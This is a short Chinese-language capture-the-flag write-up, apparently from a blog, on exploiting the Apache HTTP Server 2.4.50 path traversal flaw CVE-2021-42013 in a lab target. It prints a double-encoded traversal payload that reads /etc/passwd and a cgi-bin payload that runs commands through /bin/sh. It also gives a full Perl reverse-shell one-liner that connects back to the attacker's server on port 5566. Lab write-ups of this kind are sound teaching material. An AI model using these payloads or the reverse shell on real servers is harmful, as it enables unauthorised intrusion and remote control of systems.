当前位置: 首页 > news >正文

Apache HTTP Server 2.4.50 路径穿越漏洞(CVE-2021-42013)

1. 靶机介绍😍

这是一个nday,apache中间件漏洞,比较简单吧,也是首次做这种的夺旗题,蛮有意思的。

2. 开始开始🤔

首先我们进入它给的靶机地址,it work! 十分醒目,记住这个是apache。

我学的只知道具有一个icons目录,可以对这个目录进行路径穿越,访问到敏感文件

因为这里说了,是第一次路径穿越没有严谨,对../进行二次编码即可。

没错,正如我所学的那样,对路径进行穿越😁😁😁😁

payload:

/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

我们访问成功了,证实了这个漏洞的存在。接下来对它进行命令执行,看看是否成功 echo;whoami

因为要添加消息体,所以使用POST传参,改一下get就行了

在服务端开启了cgi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意命令:

/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

然后命令执行成功

接下来就是反弹shell,拿flag的时候了,美滋滋😍😍😍😍。

echo;perl -e 'use Socket;$i="服务器IP地址";$p=5566;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

服务器开启监听 5566端口

3. 拿下拿下😏

使用命令反弹shell成功

激动人心的拿flag时候到了,ls发现没有相关文件。

cd 切换上级目录,发现,flag.sh

cat之后自动转换了

回到相关目录拿到flag。

go-flag{9f1fdb2f-2a05-4722-9667-aeea38a65204}

http://www.dtcms.com/a/305893.html

相关文章:

  • 矩阵指数函数 e^A
  • AR技术赋能航空维修:精度与效率的飞跃
  • 基于Catboost的铁路交通数据分析及列车延误预测系统的设计与实现【全国城市可选、欠采样技术】
  • Three.js 与 WebXR:初识 VR/AR 开发
  • nest generate从入门到实战
  • 6.Origin2021如何绘制Y轴截断图?
  • Java 笔记 封装(Encapsulation)
  • 常见存储卡类型及对比
  • Elasticsearch 索引管理 API 实战:涵盖创建、查看、修改、删除及别名
  • 10 分钟上手 Elasticsearch 语义搜索(Serverless Cloud 本地双版本教程)
  • 在 Kubernetes 上部署 Label Studio
  • 汽车免拆诊断案例 | 免拆诊断发动机起动困难故障2例
  • Visual Studio Code 使用指南 (2025年版)
  • lesson28:Python单例模式全解析:从基础实现到企业级最佳实践
  • 【网络工程师软考版】路由协议 + ACL
  • 网络资源模板--基于Android Studio 实现的图书商城App
  • 如何不让android studio自动换行
  • UDP通讯和TCP通讯的区别-UDP(用户数据报协议)和 TCP(传输控制协议)
  • 第十七章 追新词
  • Python 闭包(Closure) 特性剖析
  • Linux ps -ef 命令解析
  • 三十二、【Linux网站服务器】搭建httpd服务器演示虚拟主机配置、网页重定向功能
  • STM32学习记录--Day3
  • ubuntu编译opendds
  • STM32CubeMX 生成时钟获取函数的分析
  • OmniParser:提升工作效率的视觉界面解析工具
  • react+ant design怎么样式穿透-tooltip怎么去掉箭头
  • 地下停车场照明节能:技术方案与价值重构
  • day7 替换数字那道题需要多写几次
  • 容器与虚拟机的本质差异:从资源隔离到网络存储机制